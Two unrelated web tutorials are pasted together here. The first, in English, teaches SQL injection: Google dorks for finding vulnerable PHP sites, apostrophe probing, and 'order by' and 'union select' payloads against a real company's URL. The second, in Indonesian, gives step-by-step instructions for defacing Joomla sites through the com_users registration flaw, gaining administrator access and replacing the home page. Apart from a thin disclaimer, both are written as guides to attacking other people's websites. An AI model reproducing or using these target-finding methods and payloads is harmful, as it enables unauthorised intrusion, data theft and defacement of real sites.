SQL Injection Tutorial for Beginners

Although there are thousands of potential exploits designed to take advantage of improperly designed websites, SQL injection is by far one of the most effective, easiest, and far-reaching attacks. SQL injection attacks are reported on a daily basis as more and more websites rely on data-driven designs to create dynamic content for readers. These dynamic designs use MySQL or another database system which probably relies on SQL; thus making them vulnerable to attack.
Since a SQL Injection attack works directly with databases, you should have a basic understanding of SQL before getting started.  SQL Database for Beginners is an excellent resource for those unfamiliar with Structured Query Language.
In this article, you will learn how to perform a SQL injection attack on a website. Please note that this article is for instructional purposes only. If you successfully breach a website that does not belong to you, you are in violation of federal law and could face incarceration and hefty fines. That said, it is useful to understand how SQL injection works so that you can prevent it from occurring on your own website.

What is a SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability within the database layer of an application. This vulnerability can be found when user input is incorrectly filtered for string literal escape characters embedded in SQL statements.
Although SQL injection is most commonly used to attack websites, it can also be used to attack any SQL database. Last year, a security company reported that the average web application is attacked at least four times per month by SQL injection techniques. Online retailers receive more attacks than any other industry with an online presence.

Picking a Target

The first step to performing a SQL injection attack is to find a vulnerable website. This will probably be the most time-consuming process in the entire attack. More and more websites are protecting themselves from SQL injection meaning that finding a vulnerable target could take quite some time.
One of the easiest ways to find vulnerable sites is known as Google Dorking. In this context, a dork is a specific search query that finds websites meeting the parameters of the advanced query you input. Some examples of dorks you can use to find sites vulnerable to a SQL injection attack include:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
Of course, there are many others as well. The key component of these specialized search queries is that they all focus on websites that rely on PHP scripts to generate dynamic content from a SQL database somewhere on the backend of the server. You can learn more about advanced Google search techniques in Unleash Google Search.
Remember that a SQL injection attack can work on any SQL database, but PHP-based websites are usually your best targets because they can be set up by just about anyone (i.e. WordPress) and often contain lots of valuable information about customers within the database you are attempting to hack.
However, just because Google pops up with a result using these dorks does not mean it is vulnerable to attack. The next step is to test each site until you find one that is vulnerable.
Navigate to one of the websites you found. For this example, assume that one of the search results is http://www.udemy.com/index.php?catid=1. To find out if this site is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:
http://www.udemy.com/index.php?catid=1’
Press enter and see what the website does. If the page returns a SQL error, the website is vulnerable to SQL injection. If the page loads normally, it is not a candidate for SQL injection and you should move on to the next URL in your list.
The errors you receive do not matter. As a general, if the website returns any SQL errors, it should be vulnerable to SQL injection techniques.
At this point, understanding SQL is even more important as you will begin manipulating the database directly from the vulnerable page.  Practical SQL Skills is a solid resource for beginner and intermediate users.

Starting the Attack

After locating a vulnerable site, you need to figure out how many columns are in the SQL database and how many of those columns are able to accept queries from you. Append an “order by” statement to the URL like this:
http://www.udemy.com/index.php?catid=1 order by 1
Continue to increase the number after “order by” until you get an error. The number of columns in the SQL database is the highest number before you receive an error. You also need to find out what columns are accepting queries.
You can do this by appending an “Union Select” statement to the URL. A union select statement in this URL would look like this:
http://www.udemy.com/index.php?catid=-1 union select 1,2,3,4,5,6
There are a couple of things to note in this example. Before the number one (after catid), you need to add a hyphen (-). Also, the number of columns you discovered in the previous step is the number of digits you put after the union select statement. For instance, if you discovered that the database had 12 columns, you would append:
catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12
The results of this query will be the column numbers that are actually accepting queries from you. You can choose any one of these columns to inject your SQL statements.

Exploiting the Database

At this point, you know what columns to direct your SQL queries at and you can begin exploiting the database. You will be relying on union select statements to perform most of the functions from this point forward.
The tutorial ends here. You have learned how to select a vulnerable website and detect which columns are responsive to your queries. The only thing left to do is append SQL commands to the URL. Some of the common functions you can perform at this point include getting a list of the databases available, getting the current user, getting the tables, and ultimately, the columns within these tables. The columns are where all of the personal information is stored.

Using this information, you can search for vulnerabilities within your own websites and perform penetration testing for others. Remember that what you do with this information is solely your responsibility. Hacking is a lot of fun – but it doesn’t mean you have to break the law to have a good time.

Cara deface web dengan metode Com_User


Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia. Com_User / Teknik Exploit joomla! ini dapat di gunakan untuk CMS Joomla! yang menggunakan joomla! versi 1.6.x. / 1.7.x. / 2.5.x.



Apa sih CMS Joomla itu?
Joomla! adalah Sistem manajemen konten (SMK atau CMS) yang bebas dan terbuka (free opensource) ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet. Joomla pertamakali dirilis dengan versi 1.0.0. Fitur-fitur Joomla! diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll. Joomla! menggunakan lisensi GPL.
Asal kata Joomla sendiri berasal dari kata Swahili jumla yang mengandung arti "kebersamaan".
(dikutip dari wikipedia.org)
 

Yang anda butuhkan:
1. Exploit Joomla (download disini)

Langkah-Langkah:

1. Cari web target dengan menggunakan mesin pencari dengan "dork" yang ada dibawah ini.
Klik untuk membuka: Google Dork Com_User

2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak

3. Cari web yang vuln.
*Penjelasan: Vuln = Vulnerability = Mempunyai kelemahan. Sehingga web yang dikatakan vuln berarti bisa untuk kita Deface.


Gambar diatas merupakan site "Vuln" alias menggunakan CMS Joomla Versi 1.7.X


Gambar diatas merupakan site "Joomla versi 1.6.x / 2.5.x".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.


6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.


7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 


8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 

contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda


10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.


13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/joomla/administrator

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Baca Juga!

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:
1. Web telah menghapus laman Registration Form.
2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.
4. Template tidak bisa di di ubah.
Paling sering GAGAL pada nomor 3